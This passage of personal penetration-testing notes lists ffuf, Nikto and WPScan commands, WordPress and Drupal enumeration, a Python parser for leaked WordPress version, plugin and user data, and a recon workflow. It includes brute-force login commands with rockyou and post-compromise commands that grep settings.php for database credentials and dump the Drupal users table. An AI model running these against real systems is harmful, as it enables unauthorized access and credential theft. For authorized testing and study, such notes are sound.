ffuf -w /usr/share/wordlists/dirb/small.txt -u http://example.com/FUZZ -mc 200,301 → Match specific status codes.
ffuf -w wordlist.txt -u http://example.com/FUZZ -maxtime 60 → Stop fuzzing after a maximum time.
ffuf -w wordlist.txt -u http://example.com/FUZZ -t 64 → Set thread count.

Nikto

nikto -h http://<TARGET_IP> -o niktoscan.txt → Scan a web server and save results.
nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm → Focus on specific Nikto checks and export HTML.

WPScan

wpscan --url http://<TARGET_IP> --enumerate u → Enumerate WordPress users.
wpscan --url http://<TARGET_IP> -e vp --plugins-detection mixed --api-token API_TOKEN → Enumerate vulnerable plugins.
wpscan --url http://<TARGET_IP> -e u --passwords /usr/share/wordlists/rockyou.txt → Attempt WordPress login password testing.
wpscan --url http://<TARGET_IP> -U admin -P /usr/share/wordlists/rockyou.txt → Attempt WordPress password testing for a single user.


WordPress Notes

Useful Paths

/wp-login.php → Default login page.
/wp-admin/ → Default admin panel.
/wp-content/uploads/ → Uploaded files directory.
/wp-content/themes/ → Theme files directory.
/wp-config.php → WordPress configuration file with DB settings.

Passive Checks

curl https://victim.com/ | grep 'content="WordPress' → Check page source for WordPress version hints.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' → Look for plugin references.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' → Look for theme references.

User Enumeration

curl -s -I -X GET http://blog.example.com/?author=1 → Test whether a WordPress author ID exists.
curl http://blog.example.com/wp-json/wp/v2/users → Query REST API for users if exposed.
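The passive checks and user-enumeration commands above each grep for one pattern by hand. The following is an added example, not part of the original notes: it parses a saved front page and a saved /wp-json/wp/v2/users response and reports what the site leaks (generator version, plugin and theme slugs with their ?ver= hints, exposed user slugs), which is the same information a site owner would want to confirm is hidden. The HTML and JSON samples are constructed inline; the example.invalid host is a placeholder.

```python
from __future__ import annotations
import json
import re

# Constructed sample standing in for the output of `curl -s https://<site>/`.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.3" />
<link rel="stylesheet" href="/wp-content/themes/twentytwentyfour/style.css?ver=1.0" />
<script src="/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.6"></script>
<script src="/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8.6"></script>
<link href="/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=8.5.2" rel="stylesheet" />
</head><body></body></html>"""

# Constructed sample standing in for a /wp-json/wp/v2/users response.
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://example.invalid/author/admin/"},
    {"id": 3, "name": "Jane Editor", "slug": "jane", "link": "https://example.invalid/author/jane/"},
])

GENERATOR_RE = re.compile(r'<meta[^>]+name="generator"[^>]+content="WordPress\s*([\d.]*)"', re.I)
ASSET_RE = re.compile(r'/wp-content/(plugins|themes)/([A-Za-z0-9_-]+)/([^"\'\s]*)')
VER_RE = re.compile(r'[?&]ver=([\w.]+)')

def wp_version(html: str) -> str | None:
    """Version from the generator meta tag (what `grep 'content="WordPress'` finds), or None."""
    m = GENERATOR_RE.search(html)
    if not m:
        return None
    return m.group(1) or None

def wp_components(html: str) -> dict[str, dict[str, str | None]]:
    """Map 'plugins'/'themes' -> {slug: version-or-None} from wp-content asset URLs.
    The ?ver= value is only a hint: it may be the component version or a cache-buster."""
    found: dict[str, dict[str, str | None]] = {"plugins": {}, "themes": {}}
    for kind, slug, rest in ASSET_RE.findall(html):
        v = VER_RE.search(rest)
        ver = v.group(1) if v else None
        # Keep the first version seen for a slug; never overwrite a value with None.
        if slug not in found[kind] or (found[kind][slug] is None and ver):
            found[kind][slug] = ver
    return found

def rest_users(body: str) -> list[str]:
    """User slugs (usually the login names) exposed by /wp-json/wp/v2/users; [] if not JSON."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]

if __name__ == "__main__":
    print(wp_version(SAMPLE_HTML), wp_components(SAMPLE_HTML), rest_users(SAMPLE_USERS_JSON))
```

An empty result from rest_users on a live site means the REST users endpoint is restricted, which is the state a hardened install should be in.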

WPScan Examples

wpscan --url "http://<TARGET_IP>" -e t → Enumerate installed themes.
wpscan --url "http://<TARGET_IP>" -e vt → Enumerate vulnerable themes.
wpscan --url "http://<TARGET_IP>" -e p → Enumerate installed plugins.
wpscan --url "http://<TARGET_IP>" -e vp → Enumerate vulnerable plugins.
wpscan --url "http://<TARGET_IP>" -e u → Enumerate users.
wpscan --url "http://<TARGET_IP>" --passwords path-to-wordlist → Attempt password testing.


Drupal Notes

Discovery

curl https://www.drupal.org/ | grep 'content="Drupal' → Look for Drupal metadata.
curl drupal-site.com/node/1 → Access node-based pages.
curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 "" → Try to identify Drupal version from changelog.

User / Content Enumeration

/user/register → Check whether username enumeration is possible via registration.
/user/<number> → Infer valid user IDs.
/node/<number> → Fuzz for hidden content.
droopescan scan drupal -u http://drupal-site.local → Enumerate a Drupal site automatically.

Useful Post-Compromise Paths

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null → Search for Drupal database credentials in settings.php.
mysql -u drupaluser --password='password' -e 'use drupal; select * from users' → Query Drupal users from the database when credentials are available.


Quick Workflow

1. Recon

  • Confirm host availability
  • Identify IPs, routes, and interfaces
  • Collect passive intelligence
  • Check DNS, subdomains, and web technologies

2. Discovery

  • Find live hosts
  • Scan ports
  • Detect service versions
  • Save results to files

3. Enumeration

  • SMB
  • FTP
  • SSH
  • HTTP
  • SQL
  • SMTP

4. Validation

  • Confirm misconfigurations
  • Check weak credentials in lab environments
  • Identify exposed files, shares, users, and services

5. Local Enumeration

  • Enumerate users
  • Enumerate services and scheduled tasks
  • Enumerate routes, interfaces, and processes
  • Look for credentials and interesting config files

6. Documentation

  • Save commands used
  • Save findings
  • Save screenshots
  • Keep credentials and paths organized

Notes

  • Enumeration is usually more important than exploitation.
  • Save Nmap output early.
  • Always check SMB, HTTP, FTP, and SQL if present.
  • Do not get stuck on one service too early.
  • Keep one clean workflow and reuse it.

About

Personal notes
